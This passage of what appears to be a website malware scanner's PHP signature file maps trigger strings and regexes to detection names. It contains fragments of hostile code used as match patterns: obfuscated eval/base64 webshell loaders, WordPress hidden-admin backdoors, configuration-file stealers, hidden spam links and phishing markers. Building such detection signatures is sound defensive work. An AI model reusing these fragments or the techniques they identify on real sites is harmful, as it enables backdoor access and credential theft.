		'$J930031B7214E1A8BE6AAA37CC6C1C619' => array(STR_CLEARFILE, 'php.backdoor.uploader.135', NULL),
	),

	'$x.=' => array(STR_TRIGGER,
		');@eval(@gzuncompress($x));' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.filesman.130', '\$x[\s]*=[\s]*[^;]+;[\s]*\$x\.=[^>]+@eval\(@gzuncompress\(\$x\)\);'),
	),

	'fakebot.enabled' => array(STR_TRIGGER,
		'door page rendered' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.112', NULL),
	),

	'gzuncompress(base64_decode("eJzlvX1XGzcTOPo3PaffQWz9' => array(STR_CLEARFILE, 'php.backdoor.filesman.001.011', NULL),
	'gzuncompress(base64_decode(\'eF5MmseutFyWpud9FaW/S8pWUd0QEDi1eoD33qOUUtjAe3' => array(STR_CLEARFILE, 'php.backdoor.filesman.001.016', NULL),
	'gzuncompress(base64_decode($techgaun)));?>' => array(STR_CLEARFILE, 'php.backdoor.filesman.010', NULL,1),
	'eval(gzuncompress(base64_decode($sempax)));' => array(STR_CLEARFILE, 'php.backdoor.filesman.088', NULL),
	'$unme="support_users_v-".rand(100,999);' => array(STR_CLEARFILE, 'php.backdoor.wp_adminadd.002', NULL, 1),
	'+++I-47 v' => array(STR_CLEARFILE, 'php.backdoor.I-47.001', NULL),
	'GET[timeout]&cms=$_GET[cms]&sh=$_GET[sh]&upattern=$_GET[upattern]&upattern2=$_GET[upattern2]";' => array(STR_CLEARFILE,'php.backdoor.uploader.052', NULL),
	'fwrite($fp, print_r($output, TRUE)); fclose($fp); ob_end_clean(); eval' => array(STR_CLEARFILE, 'php.backdoor.filesman.094', NULL),
	'fkAkDkfVNH5usEDYuW3XwGjNh1k3y8IwICO1g75xTB8gyfGehnjwygO+GS' => array(STR_CLEARFILE, 'php.backdoor.filesman.095', NULL),
	'create_function(\'\', gzuncompress(base64_decode("eAHNW1lzG' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.doorway-gen.111', 'create_function\(..,[\s]*gzuncompress\(base64_decode\([^;]+\);'),
	'$url = xor_string($url, $key);' => array(STR_CLEARFILE, 'php.spam-seo.redirect.130', NULL),
	'<?php $o=<<<\'EEEEEE' => array(STR_CLEARFILE, 'php.backdoor.eval_COOKIE.025', NULL),
	'@$_=create_function("",@gzuncompress($__));$_();' => array(STR_CLEARFILE, 'php.backdoor.WSO.018', NULL),
),

'styl' => array(STR_TRIGGER,

	'display:none;' => array(STR_TRIGGER,

		'<p style="position:absolute; display:none;">' => array(STR_TRIGGER,
			'>porno<' => array(STR_CLEAR_MULTIMATCH, 'html.spam-seo.hidden-style.008', '<p style=.position:absolute; display:none;.>(?:\s*<a [^>]+?>[^<>]*porn[^<>]+<.a>)+<\/\w+>'),
		),

		'<footer><nav style="display:none;"' => array(STR_CLEAR_MULTIMATCH, 'html.spam-seo.hidden-style.005', '(<nav style="display:none;">\s*)?<footer><nav style="display:none;"><\w+><a href.+?<\/nav><\/footer>'),
		'<div onclick="(a.style.display==\'none\')?a.style.display=\'block\':a.style.display=\'none\';"></div>' => array(STR_CLEAR_MULTIMATCH, 'html.spam-seo.hidden-div.019', '<div onclick="\(a.style.display==.none.\)\?a.style.display=.block.:a.style.display=.none.;"><.div>\s*<div class=.(\w). id=.\1. style=.display:none;">.+?<\/div>'),
		'ult-blk-cbl.' => array(STR_CLEAR_MULTIMATCH, 'js.malware.generic.035', '<script\s*type=.text.javascript.\s*src=.[htps]{4,}:..ult-blk-cbl[^>]+>\s*<.script>\s*<noscript>\s*<img\s*src=.[htps]{4,}:..ult-blk-cbl[^:]+:none;[^>]+>\s*<.noscript>'),
		'var download_file = "chrome.exe"' => array(STR_CLEARFILE, 'js.malware.createElement.005', NULL),
	),

	'<div style=' => array(STR_TRIGGER, 

		'echo <<<EOT' => array(STR_TRIGGER,
			'if (strpos ($spide , \'googl' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.hidden-div.009', 'function\s*(\w+)\((\$\w+)\)\s*\{\s*if\s*\(strpos\s*\(\2\s*,\s*.goog[^\$]+\2[^\{]+\{\s*return\s*.\d.;\s*\}\s*else\s*\{\s*return\s*.\d.;\s*\}\s*\}\s*(\$\w+)\s*=\s*\$_SERVER\[.HTTP_USER_AGENT.\];\s*(\$\w+)\s*=\s*strtolower\(\3\);\s*if\(\1\(\4\)\s*==\s*.\d.\)\{\s*echo\s*<<<EOT\s*<div[^>]+>[^;]+;\s*\}'),
		),

		'<div style=.display: none[^\n]+\W(cialis|pills|buy-cheap|viagra)\W[^>]+<.div>' => array(REX_CLEAR_MULTIMATCH, 'rex.hidden_spam_div.001', '<div style=.display: none[^\n]+\W(cialis|pills|buy-cheap|viagra)\W[^>]+<.div>'),
		'<div style=.position: absolute[^\n]+\W(cialis|pills|buy-cheap|viagra|montelukast|[Rr]eplica|rolex)\W[^\n]+\W(?:(cialis|pills|buy-cheap|viagra|montelukast|[Rr]eplica|rolex)\W[^\n]+)?<.div>' => array(REX_CLEAR_MULTIMATCH, 'rex.hidden_spam_div.002', '<div style=.position: absolute[^\n]+\W(cialis|pills|buy-cheap|viagra|montelukast|[Rr]eplica|rolex)\W[^\n]+\W(?:(cialis|pills|buy-cheap|viagra|montelukast|[Rr]eplica|rolex)\W[^\n]+)?<.div>'),
		'<div style[^>]+left:-\d\d+px; top.-\d\d+px;[^>]++>[^>]+(?i:student-loan|home-well-water|work-from-home|payroll-loan|viagra|cheap|zithromax|pharmacy|buy|cheap|(-| )cialis( |-)|amoxicil|bulteran|0 mg|prescription|cymbalta|diovan|dostinex|cephalexin)[^\n]++' => array(REX_CLEAR_MULTIMATCH, 'rex.hidden_spam_div.003', '<div style[^>]+left:-\d\d+px; top.-\d\d+px;[^>]++>[^>]+(?i:student-loan|home-well-water|work-from-home|payroll-loan|viagra|cheap|zithromax|pharmacy|buy|cheap|(-| )cialis(-| )|amoxicil|bulteran|0 mg|prescription|cymbalta|diovan|dostinex|cephalexin)[^\n]++'),
		'<div\s*style\s*=\s*.overflow:hidden;height:\s*(?:-)?\d+px;\s*.>(?:\n+)?\s*<a\s*href=.http(?:s)?:\/\/[^\/]+\/.\s*title\s*=\s*.(?:(cialis|pills|buy-cheap|viagra|montelukast|[Rr]eplica|rolex|futbalove\s*dresy|student-loan|home-well-water|work-from-home|payroll-loan|viagra|cheap|zithromax|pharmacy|buy|cheap))\W[^\n]+\W(?:(cialis|pills|buy-cheap|viagra|montelukast|[Rr]eplica|rolex|futbalove\s*dresy|student-loan|home-well-water|work-from-home|payroll-loan|viagra|cheap|zithromax|pharmacy|buy|cheap)\W[^\n]+)?<\/div>' => array(REX_CLEAR_MULTIMATCH, 'rex.hidden_spam_div.004', '<div\s*style\s*=\s*.overflow:hidden;height:\s*(?:-)?\d+px;\s*.>(?:\n+)?\s*<a\s*href=.http(?:s)?:\/\/[^\/]+\/.\s*title\s*=\s*.(?:(cialis|pills|buy-cheap|viagra|montelukast|[Rr]eplica|rolex|futbalove\s*dresy|student-loan|home-well-water|work-from-home|payroll-loan|viagra|cheap|zithromax|pharmacy|buy|cheap))\W[^\n]+\W(?:(cialis|pills|buy-cheap|viagra|montelukast|[Rr]eplica|rolex|futbalove\s*dresy|student-loan|home-well-water|work-from-home|payroll-loan|viagra|cheap|zithromax|pharmacy|buy|cheap)\W[^\n]+)?<\/div>'),
	),

	'<p style' => array(STR_TRIGGER, 
		'<p style=.position:\s*absolute;\s*left:\s*-\d+px;\s*top:\s*-\d+px;.>([\s\w,+]+\<a href=.[^<]+(\s*\w+\s*)+<.a>)+[^>]+<.p>' => array(REX_CLEAR_MULTIMATCH, 'rex.hidden_spam_p.001', '<p style=.position:\s*absolute;\s*left:\s*-\d+px;\s*top:\s*-\d+px;.>([\s\w,+]+\<a href=.[^<]+(\s*\w+\s*)+<.a>)+[^>]+<.p>'),
		'span class="mylinkcode"><p style="position: absolute' => array(STR_CLEAR_LINEMATCH, 'html.spam-seo.spam-links.013', '<span\s*class\s*=\s*[\'"]mylinkcode[\'"]\s*>\s*<\s*p\s*style\s*=[^\2]+position:\s*absolute[^\2]+overflow\s*:\s*hidden\s*;[^\<]+<a\s*href\s*=\s*.http[^<]+<\/a>\s*<\/p>\s*<\/span>'),
	),

	'<u style' => array(STR_TRIGGER, 
		'<u\s*style=.position:absolute;(right|left|top|bottom):-?\d{4,}px' => array(REX_TRIGGER, 
			'<u\s*style=.position:absolute;(right|left|top|bottom):-?\d{4,}px[^<]+(<a href=.http[^>]+\W([oO]nline|viagra|cialis|tadafil)\W[^>]+<.a>\s*)+<.u>' => array(REX_CLEAR_MULTIMATCH, 'rex.hidden_spam_u.001', '<u\s*style=.position:absolute;(right|left|top|bottom):-?\d{4,}px[^<]+(<a href=.http[^>]+\W([oO]nline|viagra|cialis|tadafil)\W[^>]+<.a>\s*)+<.u>'),
		),
	),

	'<style>.clear + p{left:-' => array(STR_TRIGGER,
		'<p class="clear"></p>' => array(STR_CLEAR_MULTIMATCH, 'html.spam-seo.hidden-style.006', '<style>\.clear \+ p\{left:-\d{3,}px[^<]+?<.style>\s*<p class=.clear.><.p>\s*<p>.+?<\/p>'),
	),

	'/2c3r" style' => array(STR_CLEAR_LINEMATCH, 'html.malware.img_src.001', '<img src=.http:..5.61.34.53.2c3r[^>]+border:0;.\/>'),
	'JOkEr7' => array(STR_CLEARFILE, 'php.hacktool.paypal_email_validator.005', NULL),
	'duckporno' => array(STR_CLEAR_LINEMATCH, 'html.spam-seo.hidden-style.010', '<a[^>]+duckporno.com[^<]+duckporno[^>]+<.a>'),
	'<[titleTITLE]{5}>[^<]+[hackedHACKED43]{6} [byBY]{2}[^<]+<.[title|TITLE]{5}>' => array(REX_CLEAR_MULTIMATCH, 'rex.defacement_gen.001', '(<[htmlHTML]{4}|<[titleTITLE]{5}>).*'),
	'<marquee style="position: absolute; width: 0px;">' => array(STR_CLEAR_MULTIMATCH, 'html.spam-seo.HiddenMarquee.001', '<marquee style="position: absolute; width: 0px;">[^\x02]+?<.marquee>'),
),

'ocument.write' => array(STR_TRIGGER,

	'url' => array(STR_TRIGGER,

		'fromCharCode(enkripsi' => array(STR_TRIGGER,
			'function generate_url' => array(STR_CLEARFILE, 'js.phishing.script.001', NULL),
		),

		'url[\s]*=[\s]*.https?:[^;]+;[\s]*([\w]+[\s]*=[^\n]+;[\s]*){4,}document\.write[\s]*\([\w]+\);[\s]*document\.write[\s]*\([\w]+\);' => array(REX_CLEAR_MULTIMATCH, 'php.spam-seo.iframer.007', 'url[\s]*=[\s]*.https?:[^;]+;[\s]*([\w]+[\s]*=[^\n]+;[\s]*){4,}document\.write[\s]*\([\w]+\);[\s]*document\.write[\s]*\([\w]+\);'),
	),

	'document.write(\'<div id=' => array(STR_TRIGGER,
		'.style.position = \'absolute\';' => array(STR_TRIGGER,
			'\(function[\s]*\(\)[\s]*\{[^\}]+document\.createElement' => array(REX_TRIGGER,
				'document.createElement(\'iframe\');' => array(STR_CLEAR_MULTIMATCH, 'js.spam-seo.hidden-iframe.013', '\(function[\s]*\(\)[\s]*\{[^\}]+document\.createElement\(.iframe.\);[^\}]+style\.position[\s]*=[\s]*.absolute.;[^\x02]*appendChild\([\w]+\);[\s]*[\}\)\s]+\(\);'),
			),
		),
	),

	'if(Math.floor((tmp/Math.pow(' => array(STR_TRIGGER,
		'= \'\';' => array(STR_TRIGGER,
			'+= String.fromCharCode(Math.floor((tmp/Math.pow(' => array(STR_CLEARFILE, 'js.phishing.paypal.004', NULL),
		),
	),

	'.charCodeAt(' => array(STR_TRIGGER,
		'String.fromCharCode' => array(STR_TRIGGER,
			'!\';[\s]*\}[\s]*else[\s]*\{[\s]*[\w]+[\s]*\+=[\s]*String\.fromCharCode[\s]*\([\s]*[\w]\.charCodeAt[\s]*\([^\}]+[\s\}]+document\.write\(' => array(REX_CLEAR_MULTIMATCH, 'js.malware.cryptominer.031', 'var [\w]+[\s]*=[\s]*"[^"]+";[\s]*[\w]+[\s]*=[\s]*..;[\s]*for[\s]*\([^\{]+\{[\s]*if[\s]*\([\s]*.\.charCodeAt[\s]*\([\s]*[\w][\s]*\)[\s]*==[\s]*[\d]+[\s]*\)[\s]*\{[^\}]+\}[\s]*else[\s]*if[\s]*\([\s]*..charCodeAt[^\}]+\}[\s]*else[\s]*\{[^\}]+[\s\}]+document\.write\([\s]*[\w]+[\s]*\)[\s]*;'),
		),
	),

	'wp-includes' => array(STR_PATH_TRIGGER,
		'n.partnerId=U.PARTNER_ID_PROPELLER;}' => array(STR_CLEARFILE, 'js.spam-seo.unwanted_ads.001', NULL),
	),

	'<?php echo $email; ?>' => array(STR_TRIGGER,
		'document.write(unescape(\'%3C%68%74%6D%6C%3E%3C%68%65%61%64%3E%0A%0A%3C%6D%' => array(STR_CLEARFILE, 'php.phishing.script.027', NULL),
	),

	'%48%61%63' => array(STR_CLEARFILE, 'js.defaced.script.015', NULL),
	'%50%77%6E' => array(STR_CLEARFILE, 'js.defaced.script.016', NULL),
	'<!-- Cpanel404 -->' => array(STR_CLEARFILE, 'html.defaced.Cpanel404.001', NULL),
	'%3C%74%69%74%6C%65%3E%5A%61%73%69%65%75%4E%20' => array(STR_CLEARFILE, 'html.defaced.ZasieuN.001', NULL),
	'\u0074\u0069\u0074\u006C\u0065\u003D\u0020\u0022\u0048\u0061\u0063\u006B' => array(STR_CLEARFILE, 'js.defaced.script.009', NULL),
	';document.write(\'<iframe style="position:fixed;top:0px;left:-' => array(STR_CLEAR_LINEMATCH, 'js.malware.iframe_injector.001', ';document.write..<iframe style=.position:fixed;top:0px;left:-\d+px;. src=[^>]+><.iframe>.\)'),
	'<%74%69%74%6C%65> %4C%6F%67%69%6E | %50%61%79%50%61%6C %53%65%63%75%72%69%74%79</%74' => array(STR_CLEARFILE, 'html.phishing.paypal.009', NULL),
	'\u0044\u0069\u0073\u0063\u006F\u0076\u0065\u0072\u0020\u0043\u0061\u0072\u0064\u003A\u0020\u0055\u0070\u0064\u0061\u0074\u0065' => array(STR_CLEARFILE, 'html.phishing.discover.001', NULL),
	'<h1 style=color:Red;>YOUR SYSTEM\'S SECURITY HAS BEEN SHUTTED DOWN!' => array(STR_CLEARFILE,'html.defaced.ph_haxxors.001', NULL),
	'HACKTEAM<' => array(STR_CLEARFILE, 'html.defaced.generic.087', NULL),
	'We are Anonymous' => array(STR_CLEARFILE, 'html.defaced.anonymous.001', NULL),
	'document.write%28unescape%28%22%253Cscript%' => array(STR_CLEARFILE, 'html.defaced.generic.165', NULL),
),

'<div ' => array(STR_TRIGGER,

	'<div style' => array(STR_TRIGGER,

		'top:' => array(STR_TRIGGER,
			'<?php readfile(' => array(STR_CLEAR_MULTIMATCH, 'php.malware.injector.028', '<div\s*style[^>]+top:\s*-[0-9]{3,}px;\s*left:\s*-[0-9]{3,}px;[^<]+<\?php\s*readfile[^>]+http:[^;]+(php|txt)[^<]+<.div>', 0),
		),

		'echo \'<div style="position: absolute;' => array(STR_TRIGGER,
			'px; text-align:center;"><a style="text-decoration:none;" href=' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.hidden-div.007', '..###\w+###\s*echo\s*.<div\s*style\s*=\s*.position:\s*absolute;\s*top:-\d+px;\s*width:\d+\%;\s*height:\d+px;\s*text-align:center;.><a\s*style\s*=\s*.text-decoration:none;.\s*href\s*=[^\>]+>[^;]+<.a>.;\s*..###\w+###'),
		),

		'<div style="position:absolute;filter:alpha(opacity=0);opacity:0.001;z-' => array(STR_CLEAR_MULTIMATCH, 'html.spam-seo.hidden-div.005', '<div style="position:absolute;filter:alpha\(opacity=0\);opacity:0.001;z-[^\$]+?<.div>'),
		'echo \'<div style="position:absolute; top:-\'.$r_offset.\'px;">\';' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.024', '<\?php\s+\$r_offset = rand\(1000,9999\);\s+echo [^\?]+\?>\s*<\?php\s+\$s_n = \$_SERVER\[.SERVER_NAME.\]\.\$_SERVER\[.REQUEST_URI.\];[^\?]+print \$s_link;\s*\?>\s*<\/div>'),
		'echo \'<div style="position:absolute; left:-' => array(STR_CLEAR_MULTIMATCH, 'php.malware.generic.036.02', 'echo .<div\s*style[^>]+left:-\d\d+px;[^>]++>(?:[\s\w\_\.\-"\',:!\?]*<a[^>]+href[^>]+>[^>]+a>(?i:<br>)?){1,}(?:<.div>|[^>]+<.div>).;'),
		'<div style="width:1px;height:1px;overflow: hidden;"><a href="http://' => array(STR_CLEAR_LINEMATCH, 'html.spam-seo.hidden-div.014','<div style="width:1px;height:1px;overflow: hidden;"><a href="http:..[^<]+?<.a><.div>'),
		'style="position: absolute; left:-20860px;">' => array(STR_CLEAR_MULTIMATCH, 'html.spam-seo.hidden-div.015', '<div style=["\']position:\s*absolute;[^>]+left:-20860px;">\s*<a href.+?<\/div>'),
		'<div style="position: absolute; z-index: -300; top: -2000px;"><a href="http:' => array(STR_CLEAR_LINEMATCH, 'html.spam-seo.hidden-div.010', '<div style=.position: absolute; z-index: -300; top: -2000px;.><a href=.http:\/\/[^">]+?.>http:\/\/[^<]+?<.a><.div>'),
		'<div style="position:absolute;left:-991' => array(STR_CLEAR_MULTIMATCH, 'html.spam-seo.hidden-div.018', '<div style="position:absolute;left:-991\d+px;[^>]+?>([^<]*<a href[^<]+?<.a>)+[^<]*<\/div>'),
		'; position: absolute; left:-5000px; top: -5000px;' => array(STR_CLEAR_MULTIMATCH, 'html.spam-seo.hidden-div.022', '<div\s*?style\s*?=\s*?[^>]+?; position: absolute; left:-5000px; top: -5000px;[^>]+?>\s*?<[^>]+?>\s*?<\/\w+?>\s*?<\/div>'),
		'links.php?d=$donor";' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.links-donor.001', '<div style="left:-[^>]+?>\s*<\?php\s*\$donor = \$_SERVER\[[^;]+;[^\$;]+\$server = "http[^"]+?links.php\?d=.donor";[^\$;]+\$links[^>]+echo \$links;\W+?\?>\s*<.div>'),
		'ng our services uniterrupted.<span class="Apple-converted-space">&nbsp;<' => array(STR_CLEARFILE, 'html.phishing.netflix.002', NULL),
		'&#38463;&#37324;&#24052;&#24052;&#29992;&#25143;&#21327;&#35758;' => array(STR_CLEARFILE, 'html.phishing.alibaba.005', NULL),
	),

	'<!-- #wordpress_hide -->' => array(STR_TRIGGER,
		'{position:absolute;clip:rect(' => array(STR_CLEAR_LINEMATCH, 'html.spam-seo.wordpress_hide.001', '<!-- [\w]+ -->[\s]*<style>[\s]*\.[\w]+[\s]*\{[\s]*position:absolute;clip:rect[^\n]+<.div>'),
		'{position:absolute;top:-' => array(STR_CLEAR_LINEMATCH, 'html.spam-seo.wordpress_hide.002', '<.-- #wordpress_hide -->[^\n]+<.div>'),
	),

	'pyera' => array(STR_TRIGGER,
		'<p class="pitch">Spyera is the most powerful and undetectable Spy phone Software!<br>' => array(STR_CLEARFILE, 'html.spam-seo.peepingtom.001.001', NULL),
		'document.write("<a href=\'//www.liveinternet.ru/click;EN_SPY_spyera' => array(STR_CLEARFILE, 'html.spam-seo.peepingtom.001.002', NULL),
	),

	'content="#bbb' => array(STR_TRIGGER,
		'<title>#bbbtitsbbb#</title>' => array(STR_CLEARFILE, 'html.spam-seo.japanese-spam.008', NULL),
	),

	'/FLP_top3.jpg">        </a></div>  <div class="content">' => array(STR_CLEARFILE, 'html.spam-seo.generic.003', NULL),
),

'config' => array(STR_TRIGGER,
	'symlink(\'/home/\'.$user.\'/public_html/configuration.php' => array(STR_CLEARFILE, 'pl.backdoor.conf_steal.001', NULL),
	'return inj($d,\'wp-config.php\');' => array(STR_CLEARFILE, 'php.backdoor.generic.025', NULL),
	'$email = JRequest::getVar(\'email\',\'developer222@gmail.com\');' => array(STR_CLEARFILE, 'php.backdoor.joomla-superuser.001', NULL),
	'private $_cms = null, $_path = null, $_init = null, $_site = null, $_cmstime = null,' => array(STR_CLEARFILE, 'php.backdoor.rssinit.001', NULL),
	'elseif(preg_match(\'/3[0-9]{2}/\',$http_response_header[0])) { $s=\'success\'; }' => array(STR_CLEARFILE, 'php.hacktool.bruteforce.001', NULL),
	'CiH_H@CkErZ' => array(STR_CLEARFILE, 'php.hacktool.configuration_stealer.002.001', NULL),
	'$link = getcwd() . "/" . $flib;' => array(STR_CLEARFILE, 'php.hacktool.configuration_stealer.002.002', NULL),
	'confspy.pl' => array(STR_CLEARFILE, 'pl.hacktool.configuration_stealer.002', NULL),
	'<title>Config Bot' => array(STR_CLEARFILE,'php.hacktool.configuration_stealer.005', NULL),
	': BLACK_ANG3L :' => array(STR_CLEARFILE,'php.spam-seo.doorway-gen.019', NULL),
	'if ($info->work=="false") $bot_start = false;' => array(STR_CLEARFILE,'php.backdoor.botshell.001', NULL),
	'if (strcmp(strtolower($chat), $start_bot) == 0) {' => array(STR_CLEARFILE,'php.backdoor.botshell.001.02', NULL),
	'if ($bot_start==true) post_cbox($mess);' => array(STR_CLEARFILE,'php.backdoor.botshell.001.03', NULL),
	'>SpamBOT' => array(STR_CLEARFILE,'php.backdoor.botshell.001.04', NULL),
	'$fp2 = @fopen("proxy.txt", "r");' => array(STR_CLEARFILE,'php.backdoor.botshell.001.05', NULL),
	'public $codeReplaceTemplate = \'function the_replacing($' => array(STR_CLEARFILE,'php.hacktool.cms_credentials_stealer.003', NULL),
	'echo \'__success__\'.$NowSubFolders.\'__success__\';' => array(STR_CLEARFILE, 'php.backdoor.uploader.053', NULL),
	'"<?php echo $GLOBALS[\'_config\'][\'basic_auth_var_name\'] ?>" value="<?php echo base64_encode($data[\'realm\']) ?>"' => array(STR_CLEARFILE, 'php.hacktool.php_proxy.001', NULL),
	'curl_init ("$target/wp-admin' => array(STR_CLEARFILE, 'php.backdoor.uploader.079', NULL),
),

'ZXZ' => array(STR_TRIGGER,

	'\';$' => array(STR_TRIGGER,

		'\'.$' => array(STR_TRIGGER,
			'\'.\'' => array(STR_TRIGGER,
				').\'' => array(STR_TRIGGER,
					';@$' => array(STR_TRIGGER,
						'(@$' => array(STR_TRIGGER,
							'\'));' => array(STR_TRIGGER,
								'(\'ZXZ' => array(STR_CLEARFILE, 'php.backdoor.generic.052', NULL),
							),
						),
					),
				),
			),
		),

		'=create_function(' => array(STR_TRIGGER,
			'cFZwdGMrSm1zdjJjL0FxdGE2c' => array(STR_CLEARFILE, 'php.spam-seo.injector.193', NULL),
		),
	),

	'ZXJyb3JfcmVwb3J' => array(STR_TRIGGER,
		'JF9QT1NUW3' => array(STR_CLEAR_LINEMATCH, 'php.malware.assert.012', '\$\w+\s*=\s*.ZXJyb3JfcmVwb3J0aW5nKDApOw==.;\$\w+\s*=\s*.ZXZhbC\w+JF9QT1NUW3[^;]+;\s*\$\w+\s*=\s*[(base64_decode\s*\.\")]+;\$\w+\s*=\s*[(?:assert\s*\.\")]+;\$\w+\(\$\w+\(\$\w+\)\);\$\w+\(\$\w+\(\$\w+\)\);'),
		'ZXJyb3JfcmVwb3J0aW5nKDcpOwpAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApOwpvYl9zdGFydCgpOwokbXRpbWUgICAgI' => array(STR_CLEARFILE, 'php.backdoor.webshell.114', NULL),
	),

	'CiRhdXRoX3Bhc3Mg' => array(STR_TRIGGER,
		'php\'; $filedata = base64_decode(' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.filesman.015.02', '<\?php[\s]*\$filename[\s]*=[\s]*dirname.__FILE__\)[^;]+;[\s]*\$filedata[\s]*=[\s]*base64_decode\(.[\w]{5000}[^;]+;[^>]+?\}[\s]*\?>'),
		'CiRhdXRoX3Bhc3Mg' => array(STR_CLEARFILE, 'php.backdoor.filesman.015', NULL),
	),

	'/*CACHE-CONTROL:' => array(STR_TRIGGER,
		'RhdGluZy' => array(STR_TRIGGER,
			'pbmds' => array(STR_CLEARFILE, 'php.spam-seo.generic.039', NULL),
		),
	),

	'));exit();' => array(STR_TRIGGER,
		'XSk7ZXhpdCgpO30=\';eval(base64_decode($' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.eval_POST.078', '\$[\w]+[\s]*=[\s]*.[\w+=]+ZXhpdCgpO30=.;eval\(base64_decode\(\$[\w]+\)\);exit\(\);'),
	),

	'));' => array(STR_TRIGGER,
		'ZXZhbChnemluZmxhdGUoYmFzZTY0X2RlY29kZS' => array(STR_CLEARFILE, 'php.backdoor.assert.021', NULL),
	),

	'PD9waHAgLyo' => array(STR_TRIGGER,
		'Ki8gPz48P3BocCBpZihpc3NldCgkX0dFVF' => array(STR_CLEARFILE, 'php.backdoor.base64.010', NULL),
	),

	'IpKTsg";if (!function_exists(' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.generic.010', '\$\w+=\s*array.(.\d{4}.,){3}.\d{4}.\);[^>]+ZXZhbChiYXNlNjRfZGVjb2RlKCJaWFpoYkNoaVlYTmxOalJmWkdWamIyU[^>]+;\$\w+\(\$\w+\);\}'),
	'T0iKSk7IA==";if (!function_exists(' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.generic.010.02', '(?<=[\s]{20})(:?\/\*(.{32})(_on)?\*\/\s*)?\$[\w]+[\s]*=[\s]*array\((.[\d]+.,){3}.\d+.\)[^"]+="ZXZ[^>]+;\$[\w]+\(\$[\w]+\);\}(\s*\/\*\2_off\*\/)?'), //by Fio to cover variants
	'XKjhibvlGdj5Wdm1TZ7lCZsUGLrxyYsEGLwhibvlGdj5WdmhCbhZXZ' => array(STR_CLEAR_LINEMATCH, 'js.spam-seo.injector.018', 'var [\\w_]+=.[^;]+ZXZ.;function[^?]+eval.[\\w_]+\\([\\w_]+\\([\\w_]+...;'),
	'ikpOyA=";if' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.injector.019', '[\\s]*\\$[\\w]+[\\s]*=[\\s]*array..[\\d]+.,.[\\d]+.,[^>]+\\$([\\w]+)="ZXZhbChiY[^>]+\\$[\\w]+..\\1.;}'),
	'$worm->hideWormFiles();' => array(STR_CLEARFILE, 'php.spam-seo.viaWorm_infector.001', NULL),
	'$_[+$_]++;' => array(STR_CLEARFILE, 'php.backdoor.type_juggling.001', NULL),
	'<?php eval(base64_decode(\'Ly' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_REQUEST.026', 'eval\(base64_decode\(.Ly[^;]+\)\);'),
	'JE8wTzAwMD0id01USnNkY0ZpVXFvWk5PUGJHcFloQmVqbEh1dHJ5QXZtRHpDZ1JhRVZmU1hRV2tLSXhuTHhGT2Np' => array(STR_CLEARFILE, 'php.backdoor.uploader.144', NULL),
),

'new WP_User(' => array(STR_TRIGGER,

	'->set_role(\'administrator\');' => array(STR_TRIGGER,

		'$user_id = wp_create_user( $newusername, $newpassword, $newemail);' => array(STR_TRIGGER,

			'echo \'Successfully created new admin user. Now delete this file!\'' => array(STR_TRIGGER,
				'if($_GET[adduser]' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.wpuser.002', 'if\(\$_GET.adduser\] == .1...\{[^$]+\$newusername[\s]=[^;]+;[\s]*\$newpassword[\s]*=[^;]+;[\s]*\$newemail[\s]*=[^;]+;[^!]+if[\s]*\([\s]*\$newpassword[\s]*!=[\s]*.YOURPASSWORD[^(]+if[\s]*\([\s]*!username_exists..newusername[^\']+set_role\(.administrator.\);[\s]*echo .Successfully[^>]+echo[\s]*.before running the script.[^;]+;[\s]*}[\s]*}'), 
				'echo \'before running the script. Set these variables and try again.\';' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.wpuser.002.02', '\$newusername[\s]=[^;]+;[\s]*\$newpassword[\s]*=[^;]+;[\s]*\$newemail[\s]*=[^;]+;[^!]+if[\s]*\([\s]*\$newpassword[\s]*!=[\s]*.YOURPASSWORD[^(]+if[\s]*\([\s]*!username_exists..newusername[^\']+set_role\(.administrator.\);[\s]*echo .Successfully[^>]+echo[\s]*.before running the script.[^;]+;[\s]*}'),
				'echo \'This user or email already exists. Nothing was done.' => array(STR_CLEARFILE, 'php.backdoor.wpuser.003', NULL),
			),

			'shell_exec(\'rm -f ' => array(STR_CLEARFILE, 'php.backdoor.wp_adminadd.015', NULL),
		),

		'$user_id = wp_create_user(' => array(STR_TRIGGER,

			'$_GET[\'backdoor\']' => array(STR_TRIGGER,
				'backdoor\'] == \'go' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.wp_adminadd.009', '\$\w+\s*=\s*.wp-load\.php.\;\s*require_once\(\$\w+\);[^\$]+\$_GET\[.backdoor.\][^\{]+{\s*require\(.wp-includes.registration\.php.\)\;[^\}]+}\s*else\s*{[^\$]+\$\w+\s*=\s*wp_create_user\(.[^\)]+\);\s*\$\w+\s*=\s*new\s*WP_User\(\$\w+\);\s*\$\w+->set_role\(.administrator.\);[^\}]+}\s*}\s*..\s*..echo\s*get_bloginfo\(.\w+.\);'),
				'add_action(\'wp_head\', \'wploop_backdoor' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.wp_adminadd.011', 'add_action\(.wp_head.,[\s]*.wploop_backdoor.\);[\s]*function wploop_backdoor\(\)[\s]*\{[^}]+set_role\(.administrator.\);[\s]*[\}\s]+'),
			),

			'WordPress_secret' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.wp_adminadd.022', 'add_action\(.[\w]+.,[\s]*.[\w]+.\);[\s]*function[\s]*[\w]+\(\)[\s]*\{[\s]*if[\s]*\(\$_GET\[[^!]+if[\s]*\(!username_exists\(.[\w]+.\)\)[\s]*\{[^>]+\$user->set_role\(.administrator.\);[\s]*\}[\s]*\}[\s]*\}'),
		),

		'->dbprefix."users (name, username, email, password) VALUES (\'Super Admin\', \'".$' => array(STR_TRIGGER,
			'unlink(basename($_SERVER["PHP_SELF"]' => array(STR_CLEARFILE, 'php.backdoor.adduser.002', NULL),
		),

